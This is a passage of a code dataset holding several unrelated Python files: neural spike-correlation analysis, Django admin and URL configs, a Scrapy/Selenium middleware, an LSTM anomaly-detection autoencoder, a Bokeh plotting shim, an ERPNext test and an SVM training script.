t:t + step].mean(axis=1)\n\n # check if we have info aside from zero\n if not (np.nonzero(x11)[0].size == False) or not (np.nonzero(x12)[0].size == False):\n # correlations between pop1\n corrs1[int(nselect * i1) + i2, j] = np.corrcoef(x11, x12)[0, 1]\n\n if not (np.nonzero(x21)[0].size == False) or not (np.nonzero(x22)[0].size == False):\n # correlations between pop2\n corrs2[int(nselect * i2) + i1, j] = np.corrcoef(x21, x22)[0, 1]\n\n if not (np.nonzero(x1)[0].size == False) or not (np.nonzero(x2)[0].size == False):\n # correlations across pops)\n k = np.corrcoef(x1, x2)\n corrs[int(nselect * i1) + i2, j] = k[0, 1]\n corrs[-int(nselect * i1) + i2, j] = k[1, 0]\n\n # return as corrsall, corrsii, corrsij\n corrsall = np.concatenate((corrs, corrs1, corrs2), axis=0)\n corrsii = np.concatenate((corrs1, corrs2), axis=0)\n\n # allocate variables for smoothing\n newdt = dt * step\n kernel = np.ones((int(smoothwin / newdt)))\n smoothcorrsall = np.zeros(corrsall.shape)\n smoothcorrsii = np.zeros(corrsii.shape)\n smoothcorrsij = np.zeros(corrs.shape)\n\n for n in np.arange(corrsall.shape[0]):\n smoothcorrsall[n] = np.convolve(corrsall[n], kernel, mode='same') / (smoothwin/newdt)\n\n if n < corrs.shape[0]:\n smoothcorrsii[n] = np.convolve(corrsii[n], kernel, mode='same') / (smoothwin/newdt)\n smoothcorrsij[n] = np.convolve(corrs[n], kernel, mode='same') / (smoothwin/newdt)\n\n return smoothcorrsall, smoothcorrsii, smoothcorrsij\n\n\n# decorator for experiment\nthisexperiment = '2018-12-11-09h04m25s'\n\n\n@experiment_opener({'test0': thisexperiment}, load_path, show=plt_show)\ndef plot_fig2(tables_task_ids):\n \"\"\"\n Using the experiment_opener decorator automates some of the tedious aspects of handling experiment\n files, including opening and closing the file, plus it also calls plt.show() if you ask it to.\n And finally, it fixes a problem with SVG files so that they don't explode Inkscape if you import them.\n\n :param tables_task_ids: dict mapping from user supplied name to a tuple of (tables, task_ids)\n :return:\n \"\"\"\n from snep.tables.experiment import ExperimentTables\n\n tables, task_ids = tables_task_ids['test0']\n assert isinstance(tables, ExperimentTables) # This allows PyCharm to autocomplete method names for tables\n params = tables.get_general_params(True)\n param_ranges = tables.read_param_ranges()\n\n # filter tasks to only the ones that reach the targets\n targets = [{('c',): 0, ('bfb',): 0}]\n target_ids = filter_tasks(task_ids, targets)\n\n # -------------------------------------\n # Get experiment results and params\n # -------------------------------------\n # Simulation times\n ntrls = len(target_ids)\n sub = params['sen']['populations']['sub']\n settletime = params['simulation']['settletime'] / second\n runtime = params['simulation']['runtime'] / second - settletime\n stimon = params['simulation']['stimon'] / second - settletime\n stimoff = params['simulation']['stimoff'] / second - settletime\n pops, timepoints = tables.get_raw_data(task_ids[0])['poprates_dec'].shape\n dt = runtime / timepoints\n nSE, downsampltimepoints = tables.get_computed(task_ids[0])['spikes'].shape\n time = np.linspace(0, runtime, timepoints)\n downsampltime = np.linspace(0, runtime, downsampltimepoints)\n downsampldt = runtime / downsampltimepoints\n\n # allocate variables\n rateDE = np.empty((ntrls, pops, timepoints), dtype='float32')\n rateSE = np.empty((ntrls, pops, timepoints), dtype='float32')\n spksSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # evntSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # brstSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # snglSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n pref_msk = np.empty((ntrls, 1), dtype='int')\n\n # loop through trials and retrieve results\n for trl, tid in tqdm(enumerate(target_ids)):\n # get neurometric info of all neurons\n computed = tables.get_computed(tid)\n spksSE[trl] = computed['spikes']\n # evntSE[trl] = computed['events']\n # brstSE[trl] = computed['bursts']\n # snglSE[trl] = computed['singles']\n\n # population rates\n raw_data = tables.get_raw_data(tid)\n rateDE[trl] = raw_data['poprates_dec'] # 0: pref, 1: npref\n rateSE[trl] = raw_data['poprates_sen'] # 0: pref, 1: npref\n pref_msk[trl] = raw_data['pref_msk']\n\n # -------------------------------------\n # Choice probability and correlations\n # -------------------------------------\n # accuracy\n acc = pref_msk.sum() / ntrls\n\n # get active neurons, 100 per subpopulation\n actn = get_actn(spksSE, sub)\n\n # a calculation every 1, 5 or 10 ms?\n stepCP = 10\n auc1 = get_CPs(spksSE, np.logical_not(pref_msk), actn[0], downsampldt, step=stepCP)\n auc2 = get_CPs(spksSE, pref_msk.astype(bool), actn[1], downsampldt, step=stepCP)\n auc12 = np.concatenate((auc1, auc2), axis=0)\n\n stepCorr = 50\n corrsall, corrsii, corrsij = get_corr(spksSE, actn, downsampldt, step=stepCorr)\n\n # -------------------------------------\n # Plot figure 2\n # -------------------------------------\n fig, axs = plt.subplots(4, 1, figsize=(8, 12), sharex=True)\n\n fig.add_axes(axs[0])\n plt.plot(time, rateDE[:, 0, :].mean(axis=0), c='C3', lw=2, label='preferred')\n plt.plot(time, rateDE[:, 1, :].mean(axis=0), c='C0', lw=2, label='non-preferred')\n plt.axvline(x=stimon, color='gray', ls='dashed', lw=1.5)\n plt.axvline(x=stimoff, color='gray', ls='dashed', lw=1.5)\n plt.title('Integration circuit')\n plt.ylabel('Population rate (sp/s)') # , {'horizontalalignment': 'right'}\n plt.ylim(0, 50)\n # plt.legend(loc='center right', bbox_to_anchor=(1.22, 0.82))\n\n # sensory circuit\n fig.add_axes(axs[1])\n plt.plot(time, rateSE[:, 0, :].mean(axis=0), c='C3', lw=2, label='preferred')\n plt.plot(time, rateSE[:, 1, :].mean(axis=0), c='C0', lw=2, label='pon-preferred')\n plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n plt.title('Sensory circuit')\n plt.ylabel('Population rate (sp/s)')\n plt.ylim(0, 20) # 0, 15\n plt.legend(loc='center', bbox_to_anchor=(0.76, 0.91), ncol=2, fontsize='x-small')\n\n # CPs\n # clean to plot\n aucm = auc12.mean(axis=0)\n ymin = 0.45\n cleanaucm = np.ones(aucm.shape) * np.nan\n cleanaucm[aucm > ymin] = aucm[aucm > ymin]\n\n fig.add_axes(axs[2])\n plt.plot(downsampltime[::stepCP][1:], cleanaucm, 'k', lw=2)\n plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n plt.ylabel('Choice prob.')\n plt.ylim(ymin, ymin + 0.2) # ymin+0.2\n\n # correlations\n fig.add_axes(axs[3])\n plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsall, axis=0), c='k', lw=2, label='EE')\n plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsii, axis=0), c='C4', lw=2, label='EiEi')\n plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsij, axis=0), c='C2', lw=2, label='EjEj')\n plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n plt.xlim(stimon - 0.5, stimoff + 0.5)\n plt.ylim(-0.2, 0.2) # -0.25, 0.25\n plt.xlabel('Time (s)')\n plt.ylabel('Noise correlations')\n plt.legend(loc='center', bbox_to_anchor=(0.77, 0.95), ncol=3, fontsize='x-small')\n\n # save figure\n #savepath = '/Users/PSR/Documents/WS19/MasterThesis/Experiments/run_hierarchical/'\n fig.savefig(load_path + '/' + thisexperiment + '/figure2.png')\n plt.close(fig)\n\n # -------------------------------------\n # Save analysis\n # -------------------------------------\n thisanalysisname = '/CPs-' + str(ntrls) + 'trls-' + str(targets) + '.pkl'\n\n # save variables\n with open(savepath + thisexperiment + thisanalysisname, 'wb') as f:\n pickle.dump([pref_msk,\n actn,\n auc12,\n [corrsall, corrsii, corrsij]], f)\n\n # TODO: plot burst probability and coherence levels\n # TODO: plot accuracy!\n\nif __name__ == '__main__':\n plot_fig2()\n # explore_data()\n","sub_path":"choiceProb.py","file_name":"choiceProb.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"509193079","text":"# Register your models here.\n#from django.contrib import admin\n#Activer l une ou l autre des 2 instruction ci dessous JPN 13/10/2015\nfrom django.contrib.gis import admin\n#from leaflet.admin import LeafletGeoAdmin\nfrom cnls.osmgeo_inline import OSMGeoTabularInline\n\n\nfrom .models import Organisme, Utilisateur, Action, Typeintervention, Cible, ActionLocalisation, ActionCible, ActionTypeintervention#, Status\n\n## PERMISSIONS (ajout nvx element de la liste) ##\n\nclass CibleAdmin(admin.ModelAdmin):\n\n def has_add_permission(self, request, obj=None):\n# return False\n return True\n\nclass TypeinterventionAdmin(admin.ModelAdmin):\n\n def has_add_permission(self, request, obj=None):\n return True\n\n\n## SECTIONS ##\n\n#class ActionCibleAdmin(admin.TabularInline):\nclass ActionCibleInline(admin.TabularInline):\n model = ActionCible\n extra = 2\n max_num = 3 # TODO Augmenter en production\n\n#class ActionTypeinterventionAdmin(admin.TabularInline):\nclass ActionTypeinterventionInline(admin.TabularInline):\n model = ActionTypeintervention \n extra = 2\n max_num = 3 # TODO Augmenter en production\n\n#class ActionLocalisationAdmin(admin.TabularInline):\n#class ActionLocalisationInline(admin.TabularInline):\nclass ActionLocalisationInline(OSMGeoTabularInline):\n model = ActionLocalisation \n extra = 1\n max_num = 2\n scale_text = False\n openlayers_url = '/static/OpenLayers.js'\n layerswitcher = False\n default_zoom = 3\n #'map_width': 200, 'map_height': 200, 'default_lon': -22, 'default_lat': 43, 'default_zoom': 10, 'layerswitcher': False, 'max_zoom': 15, 'min_zoom': 5, 'scale_text': False, 'debug' = True, }\n # cf. liste des paramètres modifiables https://github.com/django/django/blob/master/django/contrib/gis/admin/options.py\n\"\"\" \nclass ActionLocalisationAdmin(admin.OSMGeoAdmin):\n model = ActionLocalisation\n scale_text = False\n default_zoom = 3\n layerswitcher = False\n openlayers_url = '/static/OpenLayers.js'\n# map_width = 100\n# map_height = 100\n default_lon = -22\n default_lat = 43\n\"\"\"\n\n \n## L'Admin Principal compose des SECTIONS ##\n\nclass ActionAdmin(admin.ModelAdmin):\n#class ActionAdmin(admin.OSMGeoAdmin):\n model = Action\n radio_fields = {\"echelle_localisation\": admin.HORIZONTAL, \"devise\": admin.HORIZONTAL, \"avancement\": admin.HORIZONTAL}\n# inlines = [ActionLocalisationInline]#, ActionCibleInline, ActionTypeinterventionInline] # On a agrege les sections\n fieldsets = (\n (u'Informations générales', {\n 'fields': ('titre', 'organisme', 'typeintervention', 'cible', 'objectif', 'operateur',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Localisation', {\n 'fields': ('echelle_localisation',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Période', {\n 'fields': ('date_debut', 'date_fin', 'duree', 'avancement'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Objectifs', {\n 'fields': ('objectif', 'priorite_psn', 'resultat_cf_annee_ant',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Fonds', {\n 'fields': (('montant_prevu', 'montant_disponible',), 'devise', 'bailleurfond'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Contact', {\n 'fields': ('createur', 'contact', 'origine'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n\n (u'Informations avancées', {\n 'classes': ('wide',), #'collapse',),\n 'fields': ('description', 'commentaire'),\n }), \n )\n filter_horizontal = ('cible', 'typeintervention')\n \n\n# On enregistre les classes que l'on veut pouvoir modifier depuis l'interface d'administration, suivies éventuellement des modifications de l'interface par défaut\n\n#admin.site.register(mdgRegion, admin.OSMGeoAdmin)\nadmin.site.register(Organisme)\nadmin.site.register(Utilisateur)\nadmin.site.register(Action,ActionAdmin)\n#admin.site.register(ActionLocalisation, ActionLocalisationAdmin) #admin.OSMGeoAdmin) #, LeafletGeoAdmin)\nadmin.site.register(Typeintervention)\n\n#admin.site.register(Status)\nadmin.site.register(Cible)\n","sub_path":"cnls/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"654260841","text":"def process_ls(s):\n lines = []\n lines = s.splitlines()\n List = []\n ans = []\n for line in lines:\n if(line[0] != 'd'):\n List.append(line.split())\n for i in sorted(List, key = lambda x: (-int(x[4]), x[8:])): \n ans.append(' '.join(i[8:]))\n return ans\n","sub_path":"önn3/Python/ProcessIs.py","file_name":"ProcessIs.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"57424174","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('make_data', views.make_data, name='make_data'),\n\n path('post/', views.PostRUDView.as_view(), name='post_rud'),\n path('post/new', views.PostCreateView.as_view(), name='post_new'),\n]\n","sub_path":"frameworks/python/django/08_rest_crud/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"601387493","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom scrapy import signals\nfrom random import choice\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\nfrom scrapy.exceptions import NotConfigured\nfrom scrapy.exceptions import CloseSpider\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport importlib\nimport os\nfrom pathlib import Path\n\nclass BabyscrapeSpiderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Request, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass BabyscrapeDownloaderMiddleware(object):\n visited_pages =[]\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_request(self, request, spider):\n if 'robots.txt' not in request.url:\n if spider.name == 'hotel' and not spider.readmore_clicked:\n return self.readmore_click_response(request, spider)\n else:\n pass\n else:\n return None\n\n def readmore_click_response(self, request, spider):\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(\"enable-automation\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-infobars\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--disable-browser-side-navigation\")\n options.add_argument(\"--disable-gpu\")\n driver = webdriver.Chrome(options=options)\n #driver = webdriver.Chrome('chromedriver_win.exe', options=options)\n driver.get(request.url)\n readmore_css = 'span._3maEfNCR:nth-of-type(1)'\n attempts = 0\n\n while attempts < 2:\n try:\n readmore_present = EC.presence_of_element_located((By.CSS_SELECTOR, readmore_css))\n element = WebDriverWait(driver, 3).until(readmore_present)\n element.click()\n break\n except:\n attempts += 1\n print('Did not locate the \"Read more\" element, retrying: {}/2 '.format(attempts))\n if attempts == 2:\n driver.close()\n driver.quit()\n return HtmlResponse(url=request.url, body=\"Emergency\", encoding='utf-8', request=request)\n #raise CloseSpider(reason='Readmore Element not Found')\n\n body = driver.page_source\n drive_url = driver.current_url\n driver.close()\n driver.quit()\n spider.readmore_clicked = True\n return HtmlResponse(url=drive_url, body=body, encoding='utf-8', request=request)\n\n def process_response(self, request, response, spider):\n # Called with the response returned from the downloader.\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass RotateUserAgentMiddleware(object):\n \"\"\"Rotate user-agent for each request.\"\"\"\n def __init__(self, user_agents):\n self.enabled = False\n self.user_agents = user_agents\n\n @classmethod\n def from_crawler(cls, crawler):\n user_agents = crawler.settings.get('USER_AGENT_CHOICES', [])\n\n if not user_agents:\n raise NotConfigured(\"USER_AGENT_CHOICES not set or empty\")\n\n o = cls(user_agents)\n crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)\n return o\n\n def spider_opened(self, spider):\n self.enabled = getattr(spider, 'rotate_user_agent', self.enabled)\n\n def process_request(self, request, spider):\n if not self.enabled or not self.user_agents:\n return\n request.headers['user-agent'] = choice(self.user_agents)\n print('User agent switched to : ' + request.headers['user-agent'].decode(\"utf-8\"))\n\n","sub_path":"babyscrape/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"472186575","text":"from tensorflow.keras import optimizers\nfrom tensorflow.python.keras.layers import LSTM, RepeatVector, TimeDistributed, Dense\n\nfrom utils.algos.base_algos import SequentialMl\nfrom utils.dataset import Dataset, SequenceDataset\nfrom utils.preprocess import AnomalyDetection\nimport numpy as np\nimport pandas as pd\nimport os\nimport glob\nimport re\n\nclass Sequential(SequentialMl):\n\n def __init__(self, dataset, dataset_name, epochs=10, batch=64, lr=0.1):\n super().__init__(dataset, dataset_name=dataset_name, epochs=epochs, batch=batch, lr=lr)\n\n\n def compile_sequential(self):\n adam = optimizers.Adam(self.lr)\n self.sequential.compile(loss=\"mse\",\n optimizer=adam, metrics=['accuracy'])\n\n\nclass LSTMAutoencoder(Sequential):\n\n def __init__(self, dataset: Dataset, dataset_name, epochs=10, batch=64, lr=0.1):\n super().__init__(dataset=dataset, dataset_name=dataset_name, epochs=epochs, batch=batch, lr=lr)\n\n def init(self):\n super().init()\n timesteps, n_features = self.dataset.input_shape()\n\n self.sequential.add(\n LSTM(32, activation='relu', input_shape=(timesteps, n_features), return_sequences=True))\n self.sequential.add(LSTM(16, activation='relu', return_sequences=False))\n self.sequential.add(RepeatVector(timesteps))\n # Decoder\n self.sequential.add(LSTM(16, activation='relu', return_sequences=True))\n self.sequential.add(LSTM(32, activation='relu', return_sequences=True))\n self.sequential.add(TimeDistributed(Dense(n_features)))\n self.compile_sequential()\n\n\n\n\n def name(self):\n return \"LSTM Autoencoder\"\n\ndef clear_output_file():\n csvs = glob.glob('./../../results/**/*.csv', recursive=True)\n pngs = glob.glob('./../../results/**/*.png', recursive=True)\n for file in csvs + pngs:\n os.remove(file)\n\nif __name__ == '__main__':\n clear_output_file()\n names = []\n full_names = []\n regex = r\"Anomalies\\\\((.*?)\\.csv)\"\n for name in glob.glob('./../../data/Anomalies/*'):\n result = re.search(regex, name)\n if result:\n names.append(result.group(2))\n full_names.append(result.group(1))\n\n for i in range(len(full_names)):\n path = \"\"\n for step in range(3, 5):\n # Load and preprocess data\n preprocess_data = AnomalyDetection(data_path=\"./../../data/Anomalies/\" + full_names[i], seq_size=step, threshold_label=50)\n preprocess_data.preprocess()\n\n #Create an instant of SequenceDataset which already have some helpfull method. Example: load_test()..\n dataset = SequenceDataset(preprocess_data)\n\n #Create an instant of model which include method like: train(), predict()..\n model = LSTMAutoencoder(dataset=dataset, dataset_name=names[i]+\"/step\" + str(step), epochs=20, batch=64, lr=0.1 )\n preprocess_data.plot_data(data=preprocess_data.raw_data, title=names[i], path=model.pwd + model.image_path(names[i]))\n # model.train()\n model.load_model()\n history = model.load_history()\n model.plot_hist(history)\n print(\"Model predict: \\n\", model.predict())\n\n error_df = model.evaluation_metric(dataset.X_test, dataset.y_test)\n\n model.ROC(error_df=error_df)\n threshold_rt = model.precision_recal_curve(error_df)\n\n max_accuracy, thres = model.best_accuracy(error_df=error_df, threshold_rt=threshold_rt)\n\n model.confusion_matric(thres, error_df)\n model.reconstruction_error_for_2_class(thres, error_df)\n\n d = {\"DatasetName\": names[i], \"Step\": step, \"Threshold\": thres, \"Accuracy\": max_accuracy}\n df = pd.DataFrame([d])\n path = \"./../../results/\" + names[i] + \"/accuracies.csv\"\n if os.path.exists(path):\n df.to_csv(path, mode=\"a\", header=False)\n else:\n df.to_csv(path)\n df = pd.read_csv(path)\n df = df.sort_values(by=['Accuracy'], ascending=False)\n df.to_csv(path)\n break\n\n\n\n\n","sub_path":"utils/algos/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"151362409","text":"\n\n#calss header\nclass _COT():\n\tdef __init__(self,): \n\t\tself.name = \"COT\"\n\t\tself.definitions = [u'a small bed for a baby or young child with high bars around the sides so that the child cannot fall out', u'a light bed that can be folded so that it can be easily carried and stored', u'a narrow bed']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cot.py","file_name":"_cot.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"178835946","text":"import unittest\nimport webnotes\nimport copy\n\nfrom webnotes.model.doclist import DocList\nfrom webnotes.model.doc import Document\nfrom webnotes.model.code import get_obj\nfrom webnotes.utils import flt\n\nsql = webnotes.conn.sql\n\n\nclass TestAH(unittest.TestCase):\n\tdef setUp(self):\n\t\twebnotes.conn.begin()\n\n\tdef tearDown(self):\n\t\twebnotes.conn.rollback()\n\n\tdef testInsert(self):\n#\t\ttd = TestData()\n\t\td = DocList()\n\n\t\tcount_before = flt(sql(\"select count(*) from tab\"+_doctype)[0][0])\n\t\tif docok:\n\t\t\tfor i in docok:\n\t\t\t\td.doc = i\n\t\t\t\td.children = None\n\t\t\t\td.doc.fields['__islocal']=1\n\t\t\t\td.save(1)\n\t\tcount_after = flt(sql(\"select count(*) from tab\"+_doctype)[0][0])\n\t\tself.assertTrue(count_before+len(docok)==count_after)\n\n\tdef testFailAssert(self):\n#\t\ttd = TestData()\n\t\tif docnotok:\n\t\t\twith self.assertRaises(Exception) as context:\n\t\t\t\td = DocList()\n\t\t\t\td.doc = docnotok[0]\n\t\t\t\td.children = None\n\t\t\t\td.doc.fields['__islocal']=1\n\t\t\t\td.save(1)\n\n# Test Data\n\n#class TestData():\n\ntabOK =\t[\n\t\t{'account_name': 'acc1', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'},\n\t\t{'account_name': 'acc2', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'},\n\t\t{'account_name': 'acc3', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'}\n\t]\n\ntabNotOK = \t[\n\t\t]\n\n_doctype = 'Account'\n\nfor i in tabOK: i['doctype']=_doctype\nfor i in tabNotOK: i['doctype']=_doctype\n\ndocok = [Document(fielddata=r) for r in tabOK]\ndocnotok = [Document(fielddata=r) for r in tabNotOK]\n\n\n","sub_path":"erpnext/accounts/doctype/account/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347101115","text":"\nfrom . import plot_expr_graph as peg\nfrom .data_graph import FactorExprNode\n\ndef ggplot(data=None, aes=None):\n p = peg.BokehPlot(data)\n if aes is not None:\n return p + aes\n else:\n return p\n\ndef aes(x=None, y=None, **kw):\n return peg.Aes(**kw)\n\ndef geom_point(position=None, aes=None):\n \"\"\" **position** is one of the position_* adjustment\n functions like jitter, dodge, etc.\n \"\"\"\n g = peg.GeomPoint()\n if aes:\n g.aes = aes\n if position is not None:\n g.position = position\n return g\n \ndef geom_line(aes=None):\n if aes:\n g = peg.GeomLine(aes)\n else:\n g = peg.GeomLine()\n return g\n\ndef facet_grid(factor_expr):\n node = peg.FacetGrid()\n node.factor_expr = FactorExprNode.from_string_expr(factor_expr)\n return node\n\ndef facet_wrap(factor_expr):\n node = peg.FacetWrap()\n node.factor_expr = FactorExprNode.from_string_expr(factor_expr)\n return node\n\n\n\n\n\n","sub_path":"bokeh/attic/bokeh_ggplot.py","file_name":"bokeh_ggplot.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"199398783","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport linecache\n\ndef train_svm():\n\t'''\n\tPicking Veg(1004) and Facade (1400) as the two classes\n\tLet Veg have label 1\n\tLet Facade have label -1\n\t'''\n\n\tlam = 0.495\n\tnum_lines = open('training_set.node_features').read().count('\\n')\n\twts = 2 * np.random.uniform(0, 1, 10) - 1\n\tc = 0\n\tsse = []\n\titr = []\n\tfor i in range(num_lines):\n\t\tline = linecache.getline('training_set.node_features',i+1)\n\t\tvals = [float(j) for j in line.split()]\n\t\tfeature = vals[5:15]\n\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\tnode_id = int(vals[4])\n\t\tif node_id == 1004 or node_id == 1400:\n\t\t\tc = c + 1\n\t\t\talpha_t = 0.01/np.sqrt(float(c))\n\t\t\tmodel_value = np.dot(wts, f_vec)\n\t\t\tif node_id == 1004: y = 1\n\t\t\telse : y = -1\n\t\t\teps = 0.0\n\t\t\tif model_value >= eps and node_id == 1004: # true positive\n\t\t\t\twts = wts - 2*alpha_t*lam*wts\n\t\t\telif model_value >= eps and node_id == 1400: # false positive\n\t\t\t\twts = wts - 2*alpha_t*lam*wts + alpha_t*y*f_vec\n\t\t\telif model_value < eps and node_id == 1004: # false negative\n\t\t\t\twts = wts - 2*alpha_t*lam*wts + alpha_t*y*f_vec\n\t\t\telif model_value < eps and node_id == 1400: # true negative\n\t\t\t\twts = wts - 2*alpha_t*lam*wts\n\n\t\t\tif c == 1:\n\t\t\t\tdiff = 0\n\t\t\t\titr.append(c)\n\t\t\t\tnum_lines = open('test_set.node_features').read().count('\\n')\n\t\t\t\tfor i in range(num_lines):\n\t\t\t\t\tline = linecache.getline('test_set.node_features',i+1)\n\t\t\t\t\tvals = [float(j) for j in line.split()]\n\t\t\t\t\tfeature = vals[5:15]\n\t\t\t\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\t\t\t\tnode_id = int(vals[4])\n\t\t\t\t\tif node_id == 1004 or node_id == 1400:\n\t\t\t\t\t\tresult = np.dot(wts,f_vec)\n\t\t\t\t\t\tif node_id == 1004: y = 1\n\t\t\t\t\t\telse: y = -1\n\t\t\t\t\t\tdiff = diff + (y - result)**2\n\t\t\t\tsse.append(diff)\n\n\t\t\tif c%1000 == 0:\n\t\t\t\tdiff = 0\n\t\t\t\titr.append(c)\n\t\t\t\tnum_lines = open('test_set.node_features').read().count('\\n')\n\t\t\t\tfor i in range(num_lines):\n\t\t\t\t\tline = linecache.getline('test_set.node_features',i+1)\n\t\t\t\t\tvals = [float(j) for j in line.split()]\n\t\t\t\t\tfeature = vals[5:15]\n\t\t\t\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\t\t\t\tnode_id = int(vals[4])\n\t\t\t\t\tif node_id == 1004 or node_id == 1400:\n\t\t\t\t\t\tresult = np.dot(wts,f_vec)\n\t\t\t\t\t\tif node_id == 1004: y = 1\n\t\t\t\t\t\telse: y = -1\n\t\t\t\t\t\tdiff = diff + (y - result)**2\n\t\t\t\tsse.append(diff)\n\n\tplt.plot(itr, sse, 'r--')\n\tplt.xlabel('Iteration Number')\n\tplt.ylabel('Sum Squared Error')\n\tplt.title('Error Convergence plot')\n\tplt.grid(True)\n\tplt.show()\n\n\nif __name__ == '__main__':\n\ttrain_svm()\n","sub_path":"lab2_svm_convergence_plots.py","file_name":"lab2_svm_convergence_plots.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
